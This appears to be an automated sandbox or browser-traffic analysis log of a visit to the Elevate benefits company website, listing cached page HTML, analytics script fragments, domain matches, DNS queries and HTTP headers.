href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
          Source: chromecache_796.2.drString found in binary or memory: </script></div><div fs-cmsfilter-element="empty" class="resources_filtering-empty"><div class="heading-style-h5">No results found.</div></div></div></div></div></div></section><section id="newsletter-form" class="section-content-cta"><div class="padding-global"><div class="container-large"><div class="padding-vertical padding-xlarge"><div class="grid is-content-cta"><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cd8-076d0cd3" class="grid-item"><h2 class="text-weight-light text-color-white heading-style-h5 is-content-cta-heading">Stay ahead of the curve with key industry insights and milestone updates about what Elevate can do for you.</h2></div><div id="w-node-d0db4f55-9126-ba41-0670-93ac076d0cdb-076d0cd3" class="grid-item"><div class="form_component w-form"><form id="wf-form-Content-CTA" name="wf-form-Content-CTA" data-name="Content CTA" method="get" class="form_form is-content-cta" data-wf-page-id="65ab064ab380a3e2c2b752d4" data-wf-element-id="d0db4f55-9126-ba41-0670-93ac076d0cdd" data-turnstile-sitekey="0x4AAAAAAAQTptj2So4dx43e"><div class="form_field-wrapper"><input class="form_input is-content-cta w-input" maxlength="256" name="Email-2" data-name="Email 2" placeholder="e.g., john.smith@elevate.com" type="email" id="Email-2" required=""/></div><input type="submit" data-wait="Please wait..." class="button is-form-submit is-content-cta w-button" value="Submit"/></form><div class="form_message-success w-form-done"><div>Thank you! You&#x27;re successfully signed up.</div></div><div class="form_message-error w-form-fail"><div>Oops! Something went wrong while submitting the form.</div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
          Source: chromecache_831.2.dr, chromecache_829.2.drString found in binary or memory: </svg></div></a></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
          Source: chromecache_789.2.dr, chromecache_796.2.dr, chromecache_831.2.dr, chromecache_855.2.dr, chromecache_862.2.dr, chromecache_829.2.dr, chromecache_822.2.dr, chromecache_833.2.dr, chromecache_834.2.dr, chromecache_791.2.dr, chromecache_819.2.dr, chromecache_784.2.drString found in binary or memory: </svg></div></a><a aria-label="LinkedIn link" href="https://www.linkedin.com/company/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-linkedin" viewBox="0 0 16 16"> equals www.linkedin.com (Linkedin)
          Source: chromecache_822.2.drString found in binary or memory: </svg></div></a><div class="faq_spacer is-small"></div></nav></div></div></div></div></div></div></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
          Source: chromecache_819.2.drString found in binary or memory: </svg></div></div></div></div></div></div></section><section class="section-features1"><div class="padding-global"><div class="container-xlarge"><div class="padding-section-xlarge"><div class="gap-vertical-medium"><div class="stats_header-wrapper"><div class="text-align-center text-color-black"><div class="gap-vertical-normal"><h2 class="heading-style-h3 text-weight-light">We&#x27;re building the future of benefits</h2><div class="max-width-custom align-center"><p>Say hello to the most innovative team in the consumer benefits industry.</p></div></div></div></div><div class="os_team-section"><div class="gap-vertical-normal is-os-team"><div class="text-align-center"><h3 class="heading-style-h4 text-color-black text-weight-normal">Executive team</h3></div><div class="team_collection-list-wrapper w-dyn-list"><div role="list" class="grid is-team-members is-top w-dyn-items"><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b10e11b402fcba62fbb340_brian_cosgray.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/cosgray/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Brian Cosgray</a><div class="team-member_role-max-width">Co-Founder, CEO, and Board Member</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: chromecache_789.2.dr, chromecache_855.2.dr, chromecache_834.2.dr, chromecache_784.2.dr, chromecache_840.2.drString found in binary or memory: </svg></div></div></div></div><div class="related-content_card-label"><div fs-cmsfilter-field="type">Press Release</div></div></a></div></div></div><a fs-cmssort-reverse="true" fs-cmssort-element="trigger" fs-cmssort-field="date" href="#" class="fs_cmssort_button w-button">Button Text</a></div></div></div></div></section><section class="section-cta2"><div class="padding-global"><div class="container-large"><div class="padding-section-xlarge"><div class="text-align-center text-color-white"><div class="gap-vertical-normal is-align-center"><div class="max-width-custom7"><h2 class="heading-style-h3 text-weight-light">Ready to say goodbye to your pain points one by one?</h2></div><div class="max-width-custom align-center"><p>Schedule a demo today to see how Elevate can drive your business to new heights.</p></div><a href="/request-a-demo" class="button is-black w-button">Get a Demo</a></div></div></div></div></div></section></main><section class="footer_component"><div class="padding-global"><div class="container-full-width"><div class="grid is-footer-upper"><div id="w-node-_7cec7fe0-0a59-f095-88e1-b2723cfb2839-0c789839" class="grid is-footer-nav"><div id="w-node-e8752316-6fa4-2c6f-810e-6eb3ccffc1d9-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">For Developers</div><a href="/legal/security" class="footer_link">Security</a></div><div id="w-node-bb621407-b79d-e009-0a2a-aa80bc3eb169-0c789839" class="grid-item is-footer-nav-links"><div class="text-weight-bold">Follow Us</div><div class="button-wrapper"><a aria-label="X link" href="https://twitter.com/elevatedotinc" target="_blank" class="footer_link w-inline-block"><div class="icon-1x1-small is-footer w-embed"><svg xmlns="http://www.w3.org/2000/svg" width="100%" height="100%" fill="currentColor" class="bi bi-twitter-x" viewBox="0 0 16 16"> equals www.twitter.com (Twitter)
          Source: chromecache_822.2.drString found in binary or memory: </svg></div></div></div><nav style="height:0px" class="faq_dropdown-list w-dropdown-list"><div class="faq_spacer"></div><div class="faq_paragraph text-style-muted w-richtext"><p>Stay ahead of the curve by <a href="/resource-center#newsletter-form">signing up for news and updates</a> from the experts at Elevate. Follow us on <a href="https://www.linkedin.com/company/elevatedotinc" target="_blank">LinkedIn</a> and <a href="https://twitter.com/elevatedotinc" target="_blank">X</a> for more updates.</p></div><a href="#" class="text-style-link-block text-color-captivate-blue is-faq w-inline-block w-condition-invisible"><div class="text-weight-medium">This is some text inside of a div block.</div><div class="icon-1x1-xsmall w-embed"><svg width="100%" height="100%" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: chromecache_822.2.drString found in binary or memory: </svg></div></div></div><nav style="height:0px" class="faq_dropdown-list w-dropdown-list"><div class="faq_spacer"></div><div class="faq_paragraph text-style-muted w-richtext"><p>Stay ahead of the curve by <a href="/resource-center#newsletter-form">signing up for news and updates</a> from the experts at Elevate. Follow us on <a href="https://www.linkedin.com/company/elevatedotinc" target="_blank">LinkedIn</a> and <a href="https://twitter.com/elevatedotinc" target="_blank">X</a> for more updates.</p></div><a href="#" class="text-style-link-block text-color-captivate-blue is-faq w-inline-block w-condition-invisible"><div class="text-weight-medium">This is some text inside of a div block.</div><div class="icon-1x1-xsmall w-embed"><svg width="100%" height="100%" viewBox="0 0 16 16" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.twitter.com (Twitter)
          Source: chromecache_819.2.drString found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Alicia brings a deep background in consumer account marketing to Elevate. She is responsible for leading end-to-end marketing initiatives that promote corporate visibility and support business growth. Prior to this role, Alicia held marketing leadership roles at Optum and ConnectYourCare.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b10658f3e7ba1d16577ccd_amanda_richter.jpg" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/amanda-richter-4a22a5215/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Amanda Richter</a><div class="team-member_role-max-width">Head of Product</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: chromecache_819.2.drString found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Brian is a visionary, leading Elevate in leveraging the latest financial technology that makes consumer directed benefits easier to understand and use for employees and their families. Prior to founding Elevate, Brian led the team at Businessolver that developed and launched a proprietary, in-house consumer directed benefits solution for Fortune 100, state government, and mid-sized business clients.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b0328612c05e43c82dd6e2_brian_strom.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/bstrom/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Brian Strom</a><div class="team-member_role-max-width">Co-Founder, CTO, and Board Member</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: chromecache_819.2.drString found in binary or memory: </svg></div></div><nav class="faq_dropdown-list w-dropdown-list"><p class="faq_paragraph is-no-bottom-padding">Keith is a seasoned Employee Benefits and Financial Services executive who combines his extensive experience in solution selling, partnerships, and business development with a genuine passion for creating visionary strategies and delivering successful outcomes. Keith previously led sales teams at Businessolver, WageWorks, and DoubleNet Pay.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/662bc7bb42f8bf4f9b69b810_Untitled%20design-5.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/aliciamainoberg/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Alicia Oberg</a><div class="team-member_role-max-width">SVP, Marketing</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: Favicons.18.drString found in binary or memory: ?https://www.facebook.com/ equals www.facebook.com (Facebook)
          Source: chromecache_820.2.drString found in binary or memory: Bu();cp(function(){a();$o(b)||hn(a,b)},b)},Bu=function(){return[K.m.V,K.m.W]},Cu=/^(?:www\.)?google(?:\.com?)?(?:\.[a-z]{2}t?)?$/,Du=/^www\.googleadservices\.com$/,Hu=/^gad_source[_=](\d+)$/;function Mu(){return kp("dedupe_gclid",function(){return as()})};var Nu=/^(www\.)?google(\.com?)?(\.[a-z]{2}t?)?$/,Ou=/^www.googleadservices.com$/;function Pu(a){a||(a=Qu());return a.tq?!1:a.qp||a.rp||a.vp||a.tp||a.Tf||a.Yo||a.up||a.ep?!0:!1}function Qu(){var a={},b=Fs(!0);a.tq=!!b._up;var c=$t();a.qp=c.aw!==void 0;a.rp=c.dc!==void 0;a.vp=c.wbraid!==void 0;a.tp=c.gbraid!==void 0;a.up=c.gclsrc==="aw.ds";a.Tf=zu().Tf;var d=y.referrer?Bk(Hk(y.referrer),"host"):"";a.ep=Nu.test(d);a.Yo=Ou.test(d);return a};function Ru(a){var b=window,c=b.webkit;delete b.webkit;a(b.webkit);b.webkit=c}function Su(a){var b={action:"gcl_setup"};if("CWVWebViewMessage"in a.messageHandlers)return a.messageHandlers.CWVWebViewMessage.postMessage({command:"awb",payload:b}),!0;var c=a.messageHandlers.awb;return c?(c.postMessage(b),!0):!1};function Tu(){return["ad_storage","ad_user_data"]}function Uu(a){if(D(38)&&!ao(Wn.yl)&&"webkit"in window&&window.webkit.messageHandlers){var b=function(){try{Ru(function(c){c&&("CWVWebViewMessage"in c.messageHandlers||"awb"in c.messageHandlers)&&($n(Wn.yl,function(d){d.gclid&&du(d.gclid,a)}),Su(c)||M(178))})}catch(c){M(177)}};gn(function(){Dt(Tu())?b():hn(b,Tu())},Tu())}};var Vu=["https://www.google.com","https://www.youtube.com","https://m.youtube.com"]; equals www.youtube.com (Youtube)
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: Math.round(q);v["gtm.videoElapsedTime"]=Math.round(f);v["gtm.videoPercent"]=r;v["gtm.videoVisible"]=t;return v},zm:function(){e=ub()},ke:function(){d()}}};var ec=wa(["data-gtm-yt-inspected-"]),BI=["www.youtube.com","www.youtube-nocookie.com"],CI,DI=!1; equals www.youtube.com (Youtube)
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: c?"runIfCanceled":"runIfUncanceled",[]);if(!g.length)return!0;var h=oF(a,c,e);M(121);if(h["gtm.elementUrl"]==="https://www.facebook.com/tr/")return M(122),!0;if(d&&f){for(var m=Eb(b,g.length),n=0;n<g.length;++n)g[n](h,m);return m.done}for(var p=0;p<g.length;++p)g[p](h,function(){});return!0},rF=function(){var a=[],b=function(c){return jb(a,function(d){return d.form===c})};return{store:function(c,d){var e=b(c);e?e.button=d:a.push({form:c,button:d})},get:function(c){var d=b(c);return d?d.button:null}}}, equals www.facebook.com (Facebook)
          Source: Favicons.18.drString found in binary or memory: https://edge.microsoft.com/favicon/v1?client=chrome_desktop&nfrp=2&check_seen=true&size=32&min_size=16&max_size=256&fallback_opts=TYPE,SIZE,URL&url=https://www.youtube.com/&origin=PinningWizard equals www.youtube.com (Youtube)
          Source: Favicons.18.drString found in binary or memory: https://www.youtube.com/ equals www.youtube.com (Youtube)
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: if(!(f||g||h||m.length||n.length))return;var q={bj:f,Zi:g,aj:h,Hj:m,Ij:n,Sf:p,ac:e},r=l.YT;if(r)return r.ready&&r.ready(d),e;var t=l.onYouTubeIframeAPIReady;l.onYouTubeIframeAPIReady=function(){t&&t();d()};A(function(){for(var u=y.getElementsByTagName("script"),v=u.length,w=0;w<v;w++){var x=u[w].getAttribute("src");if(MI(x,"iframe_api")||MI(x,"player_api"))return e}for(var z=y.getElementsByTagName("iframe"),C=z.length,E=0;E<C;E++)if(!DI&&KI(z[E],q.Sf))return xc("https://www.youtube.com/iframe_api"), equals www.youtube.com (Youtube)
          Source: chromecache_813.2.dr, chromecache_860.2.dr, chromecache_820.2.drString found in binary or memory: return f}zI.N="internal.enableAutoEventOnTimer";var ec=wa(["data-gtm-yt-inspected-"]),BI=["www.youtube.com","www.youtube-nocookie.com"],CI,DI=!1; equals www.youtube.com (Youtube)
          Source: chromecache_819.2.drString found in binary or memory: s applying all the lessons learned from two decades of experience to the Elevate platform.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b0331343d43ce1ebff16e9_scott_rose.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/scottrosecoo/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Scott Rose</a><div class="team-member_role-max-width">COO</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: chromecache_819.2.drString found in binary or memory: t require help, but his team is ready to deliver an outstanding experience should they ever need it.</p></nav></div></div></div><div role="listitem" class="team-member_card-wrapper w-dyn-item"><div class="team-member_component"><img src="https://cdn.prod.website-files.com/654105530b98111cede036db/65b1034cafa8fa3df2e925c8_keith_soranno.avif" loading="lazy" alt="" class="team-member_image"/><div data-hover="false" data-delay="0" data-w-id="4390835c-7d67-7a38-d7e7-244d714392e2" class="faq_item is-team-member w-dropdown"><div class="faq_toggle w-dropdown-toggle"><div class="team-member_details-wrapper"><a href="https://www.linkedin.com/in/keithsoranno/" class="text-size-regular text-weight-semibold is-team-member-name text-style-muted">Keith Soranno</a><div class="team-member_role-max-width">EVP, Sales</div></div><div class="faq_item-icon w-embed"><svg width="20" height="12" viewBox="0 0 20 12" fill="none" xmlns="http://www.w3.org/2000/svg"> equals www.linkedin.com (Linkedin)
          Source: chromecache_849.2.dr, chromecache_809.2.drString found in binary or memory: var OH=function(a,b,c,d,e){var f=ME("fsl",c?"nv.mwt":"mwt",0),g;g=c?ME("fsl","nv.ids",[]):ME("fsl","ids",[]);if(!g.length)return!0;var h=RE(a,"gtm.formSubmit",g),m=a.action;m&&m.tagName&&(m=a.cloneNode(!1).action);M(121);if(m==="https://www.facebook.com/tr/")return M(122),!0;h["gtm.elementUrl"]=m;h["gtm.formCanceled"]=c;a.getAttribute("name")!=null&&(h["gtm.interactedFormName"]=a.getAttribute("name"));e&&(h["gtm.formSubmitElement"]=e,h["gtm.formSubmitElementText"]=e.value);if(d&&f){if(!iD(h,kD(b, equals www.facebook.com (Facebook)
          Source: 30318857-d86d-403c-8122-122faf32f482.tmp.19.drString found in binary or memory: {"net":{"http_server_properties":{"servers":[{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://api.edgeoffer.microsoft.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13396307111354246","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAABAAAABodHRwczovL2JpbmcuY29t",false],"server":"https://business.bing.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13396307111984201","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://www.microsoft.com","supports_spdy":true},{"anonymization":["GAAAABQAAABodHRwczovL2JpbmdhcGlzLmNvbQ==",false],"server":"https://services.bingapis.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://sb.scorecardresearch.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://wcpstatic.microsoft.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://c.bing.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://c.msn.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edgestatic.azureedge.net","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://trc.taboola.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://px.ads.linkedin.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://srtb.msn.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://m.adnxs.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edge.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://edgecdn-embza6g8cacagcbn.z01.azurefd.net","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://browser.events.data.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13393808731342723","port":443,"protocol_str":"quic"}],"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"network_stats":{"srtt":122937},"server":"https://img-s-msn-com.akamaized.net","suppor
          Source: global trafficDNS traffic detected: DNS query: www.elevate.inc
          Source: global trafficDNS traffic detected: DNS query: cdn.prod.website-files.com
          Source: global trafficDNS traffic detected: DNS query: d3e54v103j8qbb.cloudfront.net
          Source: global trafficDNS traffic detected: DNS query: cdn.mida.so
          Source: global trafficDNS traffic detected: DNS query: cdn.jsdelivr.net
          Source: global trafficDNS traffic detected: DNS query: js.hs-scripts.com
          Source: global trafficDNS traffic detected: DNS query: cdn.embedly.com
          Source: global trafficDNS traffic detected: DNS query: user.elevateaccounts.com
          Source: global trafficDNS traffic detected: DNS query: reefe.com.au
          Source: global trafficDNS traffic detected: DNS query: challenges.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: js.hscollectedforms.net
          Source: global trafficDNS traffic detected: DNS query: js.hs-banner.com
          Source: global trafficDNS traffic detected: DNS query: js.hsadspixel.net
          Source: global trafficDNS traffic detected: DNS query: js.hs-analytics.net
          Source: global trafficDNS traffic detected: DNS query: api.mida.so
          Source: global trafficDNS traffic detected: DNS query: player.vimeo.com
          Source: global trafficDNS traffic detected: DNS query: www.google.com
          Source: global trafficDNS traffic detected: DNS query: snap.licdn.com
          Source: global trafficDNS traffic detected: DNS query: www.clarity.ms
          Source: global trafficDNS traffic detected: DNS query: api.hubapi.com
          Source: global trafficDNS traffic detected: DNS query: forms.hscollectedforms.net
          Source: global trafficDNS traffic detected: DNS query: 2captcha.com
          Source: global trafficDNS traffic detected: DNS query: googleads.g.doubleclick.net
          Source: global trafficDNS traffic detected: DNS query: td.doubleclick.net
          Source: global trafficDNS traffic detected: DNS query: forms.hsforms.com
          Source: global trafficDNS traffic detected: DNS query: px.ads.linkedin.com
          Source: global trafficDNS traffic detected: DNS query: k.clarity.ms
          Source: global trafficDNS traffic detected: DNS query: www.linkedin.com
          Source: global trafficDNS traffic detected: DNS query: track.hubspot.com
          Source: global trafficDNS traffic detected: DNS query: c.clarity.ms
          Source: global trafficDNS traffic detected: DNS query: cdnjs.cloudflare.com
          Source: global trafficDNS traffic detected: DNS query: f.vimeocdn.com
          Source: global trafficDNS traffic detected: DNS query: fresnel.vimeocdn.com
          Source: global trafficDNS traffic detected: DNS query: i.vimeocdn.com
          Source: global trafficDNS traffic detected: DNS query: lensflare.vimeo.com
          Source: global trafficDNS traffic detected: DNS query: arclight.vimeo.com
          Source: global trafficDNS traffic detected: DNS query: vimeo.com
          Source: global trafficDNS traffic detected: DNS query: ntp.msn.com
          Source: global trafficDNS traffic detected: DNS query: clients2.googleusercontent.com
          Source: global trafficDNS traffic detected: DNS query: assets.msn.com
          Source: global trafficDNS traffic detected: DNS query: sb.scorecardresearch.com
          Source: global trafficDNS traffic detected: DNS query: c.msn.com
          Source: global trafficDNS traffic detected: DNS query: api.msn.com
          Source: global trafficDNS traffic detected: DNS query: browser.events.data.msn.com
          Source: global trafficDNS traffic detected: DNS query: r.msftstatic.com
          Source: global trafficDNS traffic detected: DNS query: chrome.cloudflare-dns.com
          Source: unknownHTTP traffic detected: POST /init/uuid HTTP/1.1host: api.mida.socontent-length: 357sec-ch-ua-platform: "Windows"user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134"content-type: text/plainsec-ch-ua-mobile: ?0accept: */*origin: https://www.elevate.incsec-fetch-site: cross-sitesec-fetch-mode: corssec-fetch-dest: emptyreferer: https://www.elevate.inc/accept-encoding: identityaccept-language: en-US,en;q=0.9priority: u=1, i
          Source: global trafficHTTP traffic detected: HTTP/1.1 403 ForbiddenDate: Fri, 06 Jun 2025 20:24:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 10876Connection: closeaccept-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcf-mitigated: challengecritical-ch: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UAcross-origin-embedder-policy: require-corpcross-origin-opener-policy: same-origincross-origin-resource-policy: same-originorigin-agent-cluster: ?1permissions-policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()referrer-policy: same-originserver-timing: chlray;desc="94baa25f0ae06e72"x-content-type-options: nosniffx-frame-options: SAMEORIGINCache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires: Thu, 01 Jan 1970 00:
